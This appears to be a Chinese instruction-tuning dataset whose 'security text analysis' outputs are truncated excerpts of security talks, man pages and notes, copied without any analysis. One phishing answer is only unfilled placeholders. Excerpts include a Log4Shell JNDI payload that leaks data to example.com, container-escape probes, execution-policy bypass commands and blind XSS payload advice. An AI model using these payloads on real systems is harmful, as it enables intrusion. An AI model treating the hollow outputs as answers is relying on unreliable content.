{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThinking Outside of the Console (Box) Squidly1 gameconsolez@gmail.com / haksys.schleppingsquid.net DefCon 15 / August 04, 2007 SaveDarfur.org HAXO(RED) See G. Mark FMI see him @ Hacker Jeopardy Crisis ongoing. Read up & help Squidly1 Squidly1  Computer Network Defense Team Lead (US Navy)  Former Red Team Lead  Independent security researcher  GSEC  Software engineering student  Wireless explorer  Heavy gamer  Fervent g33k Covert Testing Covert Testing  Used by legitimate vulnerability assessment firms and Red Teams in order to better help companies and organizations learn how to protect themselves. The focus of these testing methods is to help said entity identify possible intrusions, faulty equipment / software, bad security practices, ineffective policies  among other things. At the end of the assessment phase a report is presented to the entity in order to set into motion an informed plan for fixing the discovered deficiencies.  Used by other companies and governments in order to serve their own gain. Corporate espionage anyone? Corporate Espionage Corporate Espionage The U.S. Department of Justice (DOJ) pulled the covers off a previously-sealed case of corporate espionage by a former DuPont scientist who stole $400-million in intellectual property from his employer. - SC Magazine (16 Feb 2007) $400 million corporate espionage incident at DuPont by Ericka Chickowski (SC Magazine): http://tinyurl.com/2tdny6 Stolen laptops fuel industrial espionage fears for UK software firm by John Leyden (The Register): http://tinyurl.com/3b4uh9 A UK-based hi-tech firm that's become the victim of \"industrial espionage\" is offering a reward for information leading to the arrest of those responsible for stealing its computer hardware. Thieves who stole a number of laptops from VBi Triscan Systems also lifted hard disks from the fuel management firm's servers... Executives at the ... firm fear the thefts were aimed at gathering trade secrets rather than just routine blogs. - The Reg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTeaching Old Shellcode New Tricks DEF CON 25 @midnite_runr Whoami  US Marine (out in 2001)  Wrote BDF/BDFProxy  Found OnionDuke  Co-Authored Ebowla  Work @ Okta  Twitter: @midnite_runr  Github: github.com/ secretsquirrel Why This Talk  Its fun  Its time to update publicly available Windows shellcode Outline  History  Further Development  Mitigations and Bypasses Part I History Stephen Fewers Hash API  SFHA or Hash API or MetaSploit Payload Hash  Introduced: 8/2009  Uses a 4 byte hash to identify DLL!WinAPI in EAT  JMPs to the WinAPI ; return to payload  Some code borrowed from M.Millers 2003 Understanding Windows Shellcode paper http://blog.harmonysecurity.com/2009/08/calling-api-functions.html Typical SHFA Based Payload [SHFA][the actual payload logic] Typical SHFA Based Payload [SHFA][the actual payload logic] 1 Typical SHFA Based Payload [SHFA][the actual payload logic] 1 2 Typical SHFA Based Payload [SHFA][the actual payload logic] 1 2 3 Typical SHFA Based Payload [SHFA][the actual payload logic] [some winAPI] 1 2 3 Typical SHFA Based Payload [SHFA][the actual payload logic] [some winAPI] 1 2 3 4 Typical SHFA Based Payload [SHFA][the actual payload logic] [some winAPI] 1 2 3 4 5, Continue to 2 until done Defeating SFHA  EMET  Piotr Bania Phrack 63:15 // HAVOC - POC||GTFO 12:7 EMET Caller/EAF(+)  EAF(+)  Introduced: 2010/2014(+)  Protect reading KERNEL32/NTDLL and KERNELBASE(+)  Caller  2013  Block ret/jmp into a winAPI (Anti/rop) for critical functions EMET is EOL  Supported through July 31, 2018  Still works**  Re-introduced in Windows 10 RS3 ** Depends on threat model Tor Browser Exploit vs EMET Bypassing EMET EAF(+)  2010: Berend-Jan Wever (Skypher Blog) - ret-to-libc via ntdll  1/2012 Piotr Bania - Erase HW Breakpoints via NtContinue  9/2014 - Offensive Security - EAF+ bypass via EMET function reuse calling ZwSetContextThread directly http://web.archive.org/web/20101125174240/http://skypher.com/index.php/2010/11/17/bypassing-eaf/ http://piotrbania.com/all/ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH IMAPD 8 \"October 12, 1998\" .UC 5 .SH NAME IMAPd \\- Internet 邮件存取协议服务器 .SH 总览 .B /usr/etc/imapd .SH 描述 .I imapd 是个支持 .B IMAP4rev1 远程邮件存取协议(由RFC2060定义)的服务器 .I imapd 是由internet服务器(参见 .IR inetd (8) )来调用的 正常情况下监听对 .B IMAP 端口的连接请求该端口在 .I /etc/services 文件(参见 .IR services (5)). )中定义通常它是143 .PP .I imapd 也可以由很多基于Unix平台的客户端通过 .IR rsh (1C) 进行访问为此 .I imapd 程序必须具有一个到 .I /etc/rimapd 的链接因为这是系统认为该软件所在的地方 .SH \"又见\" rsh(1C) ipopd(8C) .SH \"[中文版维护人]\" .B meaculpa <meaculpa@21cn.com> .SH \"[中文版最新更新]\" .B 2001/05/01 .SH 中国Linux论坛man手册页翻译计划: .B http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIOActive, Inc. Copyright 2014. All Rights Reserved. Weird-Machine Motivated Practical Page Table Shellcode & Finding Out What's Running on Your System Shane Macaulay Director of Cloud Services IOActive, Inc. Copyright 2014. All Rights Reserved. Killing the Rootkit! And how to find everything running on your system!!!  Rootkit/APT technique for hiding processes  Unlink kernel structures DKOM  New 64bit detection technique ! DC22 exclusive  System/Platform independent technique  Linux/BSD/Windows/ARM64/ADM64  Works by analyzing physical memory & properties of MMU Virtual Memory system IOActive, Inc. Copyright 2014. All Rights Reserved. The Long Road  Barnaby Jack, forever in our hearts and minds. Its about the journey not the destination. IOActive, Inc. Copyright 2014. All Rights Reserved. 13 Years since ADMMutate (slide URL) http://1drv.ms/1rEBMJF  ADMmutate (last DC talk was about polymorphic shellcode)  The more things change  The more they stay the same  Thought about PT shellcode with ADMMutate  Attack is [hard/stress/]fun!!&$&%*:P;p;P  Defense is hard/stress IOActive, Inc. Copyright 2014. All Rights Reserved. Abusing x for fun & profit!  Its usually the QB that gets the headlines, offensive bias in hacker scene!  Defense is grinds it out for little glory.  Lets energize the D here, have some fun!!  A Defensive exploit  Ultimately today were killing process hiding rootkits cross 64bit OS/Platforms TODAY!  DKOM IS DEAD! Process hiding is DEAD! IOActive, Inc. Copyright 2014. All Rights Reserved. Also 13 Years ago  What else was going on back then?  x86 assembler in Bash cLIeNUX shasm is an assembler written in GNU Bash Version 2, which may work in other recent unix-style \"shell\" command interpreters. IOActive, Inc. Copyright 2014. All Rights Reserved. Ideals  As best as possible, figure out all running code  Code/hacks/weird machine's included/considered  When have we done enough?  We focus on establishing our understanding through real world targets: Hypervisor mo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PowerShell 笔记 --- **什么是 PowerShell** Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能. Windows PowerShell 需要用于管理 .NET 对象的语言.该语言需要为使用 cmdlet 提供一致的环境.该语言需要支持复杂的任务,而不会使简单的任务变得更复杂. 该语言需要与在 .NET 编程中使用的高级语言(如C#)一致. --- **学习资源** - https://www.pstips.net/ - [specterops/at-ps](https://github.com/specterops/at-ps) --- **常见报错** - **无法加载文件 `******.ps1`,因为在此系统中禁止执行脚本.有关详细信息,请参阅 \"get-help about_signing\"** ```powershell set-ExecutionPolicy RemoteSigned ``` - **使用 powershell 运行脚本报错:进行数字签名.无法在当前系统上运行该脚本.有关运行脚本和设置执行策略的详细信息** ```powershell powershell \"Set-ExecutionPolicy -ExecutionPolicy Unrestricted -force |Out-null\" ``` --- ## 安装Powershell - https://docs.microsoft.com/zh-cn/powershell/scripting/install/installing-powershell-on-windows ### 支持的 Windows 版本 *  指示仍支持 OS 或 PowerShell 版本 *  指示不支持 OS 或 PowerShell 版本 *  指示该 OS 版本不再支持 PowerShell 版本 | Windows版本 | 7.0 (LTS) | 7.1最新版 | 7.2 (LTS-preview) | | - | - | - | - | | Windows Server 2016,2019,2022 |  |  |  | | Windows Server 2012 R2 |  |  |  | | Windows Server Core(2012 R2) |  |  |  | | Windows Server Nano(1809) |  |  |  | | Windows Server 2012 |  |  |  | | Windows Server 2008 R2 |  |  |  | | Windows 11 |  |  |  | | Windows 10 1607 |  |  |  | | Windows 8.1 |  |  |  | 以下处理器体系结构在 Windows 上支持 PowerShell | Windows版本 | 7.0 (LTS) | 7.1最新版 | 7.2 (LTS-preview) | | - | - | - | - | | Nano Server 1803 | x64Arm32 | X64 | X64 | | Windows Server 2012 R2 | x64x86 | x64x86 | x64x86 | | Windows Server Core 2012 R2 | x64x86 | x64x86 | x64x86 | | Windows 10 or 11 | x64x86 | x64x86Arm64 | x64x86Arm64 | | Windows 8.1 | x64x86 | x64x86 | x64x86 | --- ## 使用 **PS1文件** 一个 PowerShell 脚本其实就是一个简单的文本文件 这个文件包含了一系列 PowerShell 命令每个命令显示为独立的一行对于被视为 PowerShell 脚本的文本文件它的文件名需要加上 .PS1 的扩展名 **PowerShell 的执行策略** 为防止恶意脚本的执行PowerShell 有一个执行策略默认情况下这个执行策略被设置为受限 我们可以使用: Get-ExecutionPolicy 命令查看 PowerShell 当前的执行策略它有多个策略 * AllSigned: 仅当脚本由受信任的发布者签名时才能运行. * Bypass: 没有任何内容被阻止也没有警告或提示. * Default: 设置默认执行策略 受限于 Windows 客户端或 RemoteSigned 受限于 Windows 服务器 * RemoteSig", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Log4j2 lookup feature JNDI injection (CVE-2021-44228) [中文版本(Chinese version)](README.zh-cn.md) Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback's architecture. On Dec 2021, a 0-day exploit in the Apache Log4j2 was discovered. Log4js JNDI support has not restricted what names could be resolved. Some protocols like `rmi:` and `ldap:` are unsafe or can allow remote code execution. References: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://xz.aliyun.com/t/10649 ## Vulnerability Environment Apache Log4j2 is not a certain web service, it is just a third-party library, so we can use a application that depend on Log4j2 to demonstrate how to exploit this vulnerability. Execute following command to start a Apache Solr 8.11.0, which use Log4j 2.14.1: ``` docker compose up -d ``` After server start, browse `http://your-ip:8983` to see the admin portal of Apache Solr. ## Exploit Simply, put the payload `${jndi:dns://${sys:java.version}.example.com}` as the admin action that can trigger the JNDI query. ``` GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1 Host: your-ip:8983 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close ``` Query will be shown at the DNS log: ![](1.png) Exploit JNDI injection with [this tool](https://github.com/su18/JNDI) to execute arbitrary commands, `touch /tmp/success` is succesful executed: ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# FreeMarker **FreeMarker 模版语言说明** - 文本包括 HTML 标签与静态文本等静态内容该部分内容会原样输出 - 插值语法为 `${}` 这部分的输出会被模板引擎计算的值来替换 - 指令标签`<#>` 或者 `<@ >` 如果指令为系统内建指令如 assign 时用 `<# >` 如果指令为用户指令则用 `<@ >` 利用中最常见的指令标签为 `<#assign>` 该指令可创建变量 - 注释由 `<#--` 和 `-->` 表示注释部分的内容会 FreeMarker 忽略", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPost-quantum cryptography Daniel J. Bernstein & Tanja Lange University of Illinois at Chicago; Ruhr University Bochum & Technische Universiteit Eindhoven 12 September 2020 Cryptography Sender Alice Receiver Bob Tsai Ing-Wen picture credit: By 總統府, Attribution, Wikimedia. Donald Trump picture credit: By Shealah Craighead - White House, Public Domain, Wikimedia. Daniel J. Bernstein & Tanja Lange Post-quantum cryptography 2 Cryptography Sender Alice Untrustworthy network Eve Receiver Bob  Motivation #1: Communication channels are spying on our data.  Motivation #2: Communication channels are modifying our data. Tsai Ing-Wen picture credit: By 總統府, Attribution, Wikimedia. Donald Trump picture credit: By Shealah Craighead - White House, Public Domain, Wikimedia. Daniel J. Bernstein & Tanja Lange Post-quantum cryptography 2 Cryptography Sender Alice Untrustworthy network Eve Receiver Bob  Motivation #1: Communication channels are spying on our data.  Motivation #2: Communication channels are modifying our data.  Literal meaning of cryptography: secret writing.  Achieves various security goals by secretly transforming messages.  Confidentiality: Eve cannot infer information about the content  Integrity: Eve cannot modify the message without this being noticed  Authenticity: Bob is convinced that the message originated from Alice Tsai Ing-Wen picture credit: By 總統府, Attribution, Wikimedia. Donald Trump picture credit: By Shealah Craighead - White House, Public Domain, Wikimedia. Daniel J. Bernstein & Tanja Lange Post-quantum cryptography 2 Commonly used systems Sender Alice Untrustworthy network Eve Receiver Bob Cryptography with symmetric keys AES-128. AES-192. AES-256. AES-GCM. ChaCha20. HMAC-SHA-256. Poly1305. SHA-2. SHA-3. Salsa20. Cryptography with public keys BN-254. Curve25519. DH. DSA. ECDH. ECDSA. EdDSA. NIST P-256. NIST P-384. NIST P-521. RSA encrypt. RSA sign. secp256k1. Tsai Ing-Wen picture credit: By 總統府, Attribution, Wikimedia. Donald Trump picture credit: By S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释钓鱼攻击的原理和防护方法", "input": "", "output": "钓鱼攻击是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 容器逃逸方法检测指北 --- <center><h1>容器逃逸方法检测指北</h1></center> --- ## 0x00 前言 最近发现有关容器逃逸的文章大多覆盖的方法不全而且有些缺少相应的检测方法导致 RT 在拿到一个容器权限时比较难以判断这个容器存在哪些逃逸方法 本文尽可能覆盖全容器逃逸检测的方法并尽可能的给出在容器内部就能检测的方法这样 RT 在容器内运行一下命令根据返回的结果就能判断有没有这个漏洞了 针对这些检测方法我这边也写了相应的脚本方便在容器内部一键检测脚本放到文章底部了 对于一些无法直接在容器内部检测到的逃逸方法这里是不列举的如果读者知道其他逃逸漏洞的检测方法欢迎留言或者给脚本提 PR ### 判断是否为容器环境 首先对于 RT 而言需要先判断当前环境是不是容器环境可以直接使用下面的命令去判断 ```bash cat /proc/1/cgroup | grep -qi docker && echo \"Is Docker\" || echo \"Not Docker\" ``` 如果返回 Is Docker说明当前是 Docker 容器环境反之亦然 ### 容器逃逸介绍 在开始之前对于容器逃逸主要有以下三种方法 1. 不安全的配置 2. 相关程序漏洞 3. 内核漏洞 这里分别列举一下每种逃逸的检测方法这样在拿到一个容器权限的时候本文可以起到一个手册的作用 RT 可以通过本文中所提到的检测方法判断出当前容器可能存在哪种逃逸漏洞从而采取对应的逃逸方法 *注意* 1. *以下检测方法大多是基于笔者自己的经验可能会存在误检或者漏检的情况如果读者发现欢迎留言或者给脚本提 Issue* 2. *由于相关程序漏洞这种逃逸方法需要根据目标 Docker 的版本去判断这里暂时没想到从容器内部获取 Docker 版本的方法因此脚本暂时还不支持这块的检测* ## 0x01 不安全的配置 ### 1特权模式 执行以下命令如果返回 Is privileged mode 则说明当前是特权模式 ```bash cat /proc/self/status | grep -qi \"0000003fffffffff\" && echo \"Is privileged mode\" || echo \"Not privileged mode\" ``` 如果返回 Not privileged mode 则说明当前不是特权模式 ### 2挂载 Docker Socket 执行以下命令如果返回 Docker Socket is mounted. 说明当前挂载了 Docker Socket ```bash ls /var/run/ | grep -qi docker.sock && echo \"Docker Socket is mounted.\" || echo \"Docker Socket is not mounted.\" ``` 如果返回 Docker Socket is not mounted. 则说明没有挂载 ### 3挂载 procfs 执行以下命令如果返回 Procfs is mounted. 说明当前挂载了 procfs ```bash find / -name core_pattern 2>/dev/null | wc -l | grep -q 2 && echo \"Procfs is mounted.\" || echo \"Procfs is not mounted.\" ``` 如果返回 Procfs is not mounted. 则说明没有挂载 ### 4挂载宿主机根目录 执行以下命令如果返回 Root directory is mounted. 则说明宿主机目录被挂载 ```bash find / -name passwd 2>/dev/null | grep /etc/passwd | wc -l | grep -q 7 && echo \"Root directory is mounted.\" || echo \"Root directory is not mounted.\" ``` 如果返回 Root directory is not mounted. 则说明没有挂载 ### 5Docker remote api 未授权访问 执行以下命令如果返回 Docker Remote API Is Enabled. 说明目标存在 Docker remote api 未授权访问 ```bash IP=`hostname -i | awk -F. '{print $1 \".\" $2 \".\" $3 \".1\"}' ` && timeout 3 bash -c \"echo >/dev/tcp/$IP/2375\" > /dev/null 2>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPush The Stack Consulting http://pushthestack.com Security When Nanoseconds Count a whitepaper on the security issues and challenges with next generation finance and trading infrastructures Blackhat USA Briefings 2011 Abstract There's a brave new frontier for IT Security - a place where \"best practices\" do not contemplate the inclusion of a firewall in the network. This frontier is found in the most unlikely of places, where it is presumed that IT Security is a mature practice. Banks, Financial Institutions and Insurance Companies. High Speed Trading, High Frequency Trading, Low Latency Trading, Algorithmic Trading -- all words for electronic trades committed in microseconds without the intervention of humans. There are no firewalls, everything is custom and none of it is secure. It's SkyNet for Money and it's happening now. Introduction Throughout the course of modern financial times, technology has influenced the development and maturity of all markets, from the chalk boards and runners of the late 1700s to the current trend towards incredibly quick trades performed entirely within electronic systems without any human intervention. The communications revolution of the 1800s brought about swift changes from the carrier pigeons used by Reuters in the early part of the century to the first telegraph based ticker systems of the 1860s. Advances through the early and mid 20th century lead to the introduction of computers as the trusted stores of data on trade pricing, volumes, opening and closing prices and more. The electronic nature of stock markets became part of most peoples general awareness with the opening of the NASDAQ exchange in the early 1970s and the move to the electronic small order execution system in the late 1980s. Security When Nanoseconds Count - Blackhat USA Briefings 2011 2011-07-13 Page 2 Arlen-SecurityWhenNanosecondsCount-Whitepaper-v1.docx High frequency trading likely started in concert with changes initiated by the US Securities and Exchange Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Google CTF 2018 Quals Team: c7f.m0d3, akrasuski1, chivay, rodbert, eternal, sasza, nazywam, monk, shalom ### Table of contents * [Perfect secrecy (crypto)](crypto_secrecy) * [MITM (crypto)](crypto_mitm) * [Dogestore (crypto)](crypto_dogestore) * [Translate (web)](web_translate) * [Cat chat (web)](web_catchat) * [Shall we play a game (re)](re_shallweplay) * [APT42 - Part 1 (re)](apt42-part1) * [Sandbox Compat (pwn)](sandbox_compat) * [Back to the basics (re)](back_to_the_basics) * [Better ZIP (crypto)](better_zip) * [Proprietary format (re)](proprietary_format) * [Tape (misc)](tape) * [Wired csv (misc)](wired_csv)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH DEALLOCVT 1 \"1997年10月6日\" \"控制台工具\" \"Linux用户手册\" .SH NAME(名称) deallocvt \\- 释放未使用的虚拟终端 .SH SYNOPSIS(总览) .BI \"deallocvt [ \" \"N1 N2\" \" ... ]\" .SH DESCRIPTION(描述) 如果不指定参数, .B deallocvt 程序会释放所有未使用的虚拟终端的核心内存和数据结构. 如果给定了参数 .I Ni 那么就只释放TTY .RI /dev/tty Ni . 如果一个虚拟终端不是前台控制台,而且没有在上面打开进程 执行读或写操作,又没有在该屏幕上选择文本,那么认为该 终端是未使用的. .SH \"SEE ALSO\"(另见) .BR chvt (1), .BR openvt (1).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGetting F***** on the River Gus Fritschie and Steve Witmer with help from Mike Wright, and JD Durick August 6, 2011 Presentation Overview Preflop Who We Are What is Online Poker Online Poker History Current Events Flop Past Vulnerabilities RNG SuperUser SSL Account Compromise Poker Bots Turn Online Poker Architecture Poker Client=Rootkit Web Application Vulnerabilities Authentication Vulnerabilities Attacking Supporting Infrastructure River Defenses  Application Defenses  User Next Steps in Research Conclusion Questions  SeNet International Corp. 2011 3 August 2011 SeNet Preflop  SeNet International Corp. 2011 4 August 2011 SeNet Who We Are  SeNet International SeNet International is a Small Business Founded in 1998 to Deliver Network and Information Security Consulting Services to Government and Commercial Clients  High-End Consulting Services Focus:  Government Certification and Accreditation Support  Network Integration  Security Compliance Verification and Validation  Security Program Development with Business Case Justifications  Complex Security Designs and Optimized Deployments  Proven Solution Delivery Methodology:  Contract Execution Framework for Consistency and Quality  Technical, Management, and Quality Assurance Components  Exceptional Qualifications:  Executive TeamSecurity Industry Reputation and Active Project Leadership  Expertise with Leading Security Product Vendors, Technologies, and Best Practices  Advanced Degrees, Proper Clearances, Standards Organization Memberships, and IT Certifications  Corporate Resources:  Located in Fairfax, Virginia  Fully Equipped Security Lab  Over 40 full time security professionals  SeNet International Corp. 2011 5 August 2011 SeNet Who We Are  Gus Fritschie CTO of a security consulting firm based in the DC metro area. Enjoys penetrating government networks (with their permission), playing golf (business development) and teaching my daughter to gamble.  SeNet International Corp. 2011 6 August 2011 SeNet Who We Are ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBLIND XSS @adam_baldwin HI, IM ADAM BALDWIN NOT THAT ADAM BALDWIN THIS ADAM BALDWIN  Chief Security Officer at &yet  Security Lead for Lift Security  @adam_baldwin + @liftsecurity  What is it?  Using it in penetration tests  Challenges  xss.io LETS TALK BLIND XSS BLIND XSS WTF IS BLIND XSS WTF IS  Reflected  Persistent (stored)  DOM XSS IS:  Reflected  Persistent (stored)  DOM BLIND XSS IS: ITS A DIFFERENT CHALLENGE. ITS NOT LIKE BLIND SQLI WHERE YOU GET IMMEDIATE FEEDBACK. YOU HAVE NO IDEA WHERE YOUR PAYLOADS GOING TO END UP. YOU DONT EVEN KNOW WHETHER YOUR PAYLOAD WILL EXECUTE (OR WHEN!) YOU MUST THINK AHEAD ABOUT WHAT YOU WANT TO ACCOMPLISH. ... AND YOU HAVE TO BE LISTENING. BLIND XSS IS BLIND XSS IS CALL ME MAYBE? FOR EXAMPLE... From a recent penetration test 1.Carefully choose the right payload for the right situation. STEPS TO A SUCCESSFUL BLIND XSS EXPLOIT: 1.Carefully choose the right payload for the right situation. 2.Get lucky! STEPS TO A SUCCESSFUL BLIND XSS EXPLOIT:  Lots of payloads for various situations.  ...but doing everything would be overkill. HTML5SEC.ORG PLAN YOUR PAYLOAD. HOW WILL THE APP USE YOUR DATA?  log viewers  exception handlers  customer service apps (chats, tickets, forums, etc)  anything moderated NICE TARGETS: BLIND XSS MANAGEMENT XSS.IO CAN HELP! SIZE MATTERS... RIGHT?  Sometimes you need all the character space you can get.  No short-url GUID  xss.io uses custom referrer- based redirects instead EXPLOIT CREATOR  Snippets for common tasks  Quickly create and reference dynamic payloads DEAD DROP BLIND XSS API AND MANAGER (XSS.IO DEMO) BUT WAIT, THERES MORE Unrelated but equally awesome CSRF.IO </PRESENTATION> @adam_baldwin | @LiftSecurity", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUntrustworthy Hardware And How to Fix It Seeking Hardware Transparency PRESENT DAY. PRESENT TIME  - ##FPGA, ##crypto and #openRISC on Freenode - Shorne and Olofk from #openRISC (hardware and cross-compilation help) - PropellerGuy (Parallax Propeller open-source IO interface) - Maitimo, International Finance, DC408 Greetz: Thanks to Contributors: - core modern open source algorithms for strong cryptography have been heavy scrutinized, tested and are readily available - weak (DES, WEP, etc) and black box privacy tools are becoming a thing of the past - free and open source software has made it easier to trust the privacy of computer systems Layer:01 Software Lets assume the software (hypothetically) is 100% secure Where do we go from here? - firmware is almost exclusively closed source and controls almost all hardware devices and functions - due to their low-level nature, malicious firmware persists across OS reinstallations - \"SPI flash is a really nice place if you can get there\" (DEF CON 22: Summary of Attacks Against BIOS and Secure Boot) Layer:02 Firmware - hardware is almost always absolutely trusted by the rest of the system, as it is not widely considered an attack surface (especially in the consumer space) Layer:03 Hardware - hardware is almost always absolutely trusted by the rest of the system, as it is not widely considered an attack surface (especially in the consumer space) - NSA has been caught hardware backdooring Cisco systems (Glenn Greenwald, No Place to Hide), and DoD, Apple suspect adversarial nation states may be doing this as well Layer:03 Hardware - hardware is almost always absolutely trusted by the rest of the system, as it is not widely considered an attack surface (especially in the consumer space) - NSA has been caught hardware backdooring Cisco systems (Glenn Greenwald, No Place to Hide), and DoD, Apple suspect adversarial nation states may be doing this as well - if the hardware is compromised, then the whole machine is compromised Layer", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nABUSING CERTIFICATE TRANSPARENCY OR HOW TO HACK WEB APPLICATIONS BEFORE INSTALLATION. Hanno Böck https://hboeck.de/ 1 HTTPS 2 CERTIFICATE AUTHORITIES (CAS) 3 CAN WE TRUST CERTIFICATE AUTHORITIES? 4 NO Many cases of illegitimate certificates in the past. 5 IMPROVE OR REPLACE? Popular Infosec opinion: CAs are bad, we need to get rid of them. 6 HOW? Reality: Nobody has a feasible plan how to replace CAs. 7 IMPROVING THE CA ECOSYSTEM 8 BASELINE REQUIREMENTS 9 HTTP PUBLIC KEY PINNING (HPKP) 10 CERTIFICATE AUTHORITY AUTHORIZATION (CAA) 11 CERTIFICATE TRANSPARENCY (CT) 12 PUBLIC LOGS Let's put all certificates into public logs that everyone can read. 13 CT DETAILS Merkle Hash Trees, Signed Certificate Timestamps (SCT), Signed Tree Head (STH), Precertificates, Monitors, Gossip, ... It's complicated, but not relevant for this talk. 14 CERTIFICATE LOGGING In the future logging will be required (April 2018). 15 CT TODAY Most certificates already get logged. 16 WATCHING THE CAS Certificate Transparency means everyone can check logs for suspicious activity. 17 https://crt.sh 18 19 CERTIFICATE TRANSPARENCY IS A DATA SOURCE For researchers. For search engines. For attackers? 20 FEED OF NEW HOST NAMES Certificates contain hostnames. In other words: Certificate Transparency provides a feed of newly created HTTPS host names. 21 SELF-HOSTED WEB APPLICATIONS Wordpress, Joomla, Drupal etc. 22 WEB APPLICATION INSTALLERS 23 INSTALLERS Upload files to hoster, open in browser. Installer asks for some settings (initial user account, database credentials, ...). 24 INSTALLER (IN)SECURITY Usually installing needs no authentication! 25 GOOGLE DORKING WEB INSTALLERS Old idea: Use Google to find unprotected installers. 26 ATTACK IDEA During installation there is a time window between uploading files and completing the installer without any protection. 27 Remember: We have a stream of newly created host names. 28 HTTPS AND CERTIFICATES HTTPS is becoming more popular and many hosters automatically i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntempfile === shell中给临时文件命名 ## 补充说明 有时候在写Shell脚本的时候需要一些临时存储数据的才做最适合存储临时文件数据的位置就是`/tmp`因为该目录中所有的内容在系统重启后就会被清空下面是两种方法为临时数据生成标准的文件名 ### tempfile命令 `tempfile命令`只有在基于Debian的发行版中才默认自带比如Ubuntu其他发行版没有这个命令 用tempfile命令为一个临时文件命名 ```shell temp_file_name=$(tempfile) ``` 用一个加带了随机数的文件名作为临时文件命名 ```shell temp_file_name=\"/tmp/file_$RANDOM\" ``` $RANDOM是一个返回随机数的环境变量 ### $$变量 如果没有tempfile命令的Linux发行版也可以使用自己的临时文件名 ```shell temp_file_name=\"/tmp/file.$\" ``` `$$`是系统预定义变量显示当前所在进程的进程号用`.$$`作为添加的后缀会被扩展成当前运行脚本的进程id", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDon't Ruck Us Again The Exploit Returns echo $USER  Gal Zror - @waveburst  Security research leader at Aleph Research by HCL AppScan  10+ RE, 0days, Exploits, embedded Linux devices Recap  Credential leakages + SSH jailbreak  Unauth stack buffer overflow  Command injection + Auth bypass R510 Unleashed  AP: C110, E510, H320, H510, M510, R310, R500, R510 R600, R610, R710, R720, T300, T301n, T310d, T610, T710  ZoneDirector line  Unleashed Firmware <= (200.7.10.102.92) Whats New?  Patch did not fix all vulnerabilities  Now I own a device  New Ghidra script Previous script New script Script output Example Embedthis code Ruckus code Unknown code Ghidra script - ReplaceFuncNameFromSource  github.com/alephsecurity/general-research-tools First Attack Scenario Demo Time! IN CASE DEMO GODS ARE WRATHFUL CLICK LINK Web interface  /bin/webs  /bin/emfd  /usr/lib/libemf.so Web interface Mark ruckus functions Web interface - /bin/webs Unsafe string copy Grep it wlanSysConfirm.jsp Smashing Exploitation Gadget 1 - sub sp, fp, #0x14 ; pop {r4, r5, r6, r7, fp, pc} Gadget 2 - mov r0, r4 ; pop {r4, pc} Call System() Other Attacks Other vulnerabilities found  XSS  DOS  Info leak -> jailbreak Cross-Site Scripting Denial of Service Information Leakage Second Attack Scenario Command injection Command injection Patched command injection is_validate_input_string() Spot the Characters Shebang Previous Command Injection New Command Injection system.xml Credentials overwrite CheckResetCredentialConfPara Ajax Request AjaxConf adapter_setConf repoGetCurChild Slash!!! Overwrite Chaining + Footprinting Demo Time #2 IN CASE DEMO GODS ARE WRATHFUL CLICK LINK  Current research:  2 different RCEs:  #1 - pre-auth stack overflow  #2 - command injection + cred overwrite  New Ghidra script  Previous research:  3 different RCEs  Tools - QEMU dockers and Ghidra script Conclusions Final thoughts  Research = Fun  Follow-up research = More Fun  Blog post at alephsecurity.com Thanks alephsecurity.com @alephsecurity", "category": "text_analysis", "source": "security_papers"}
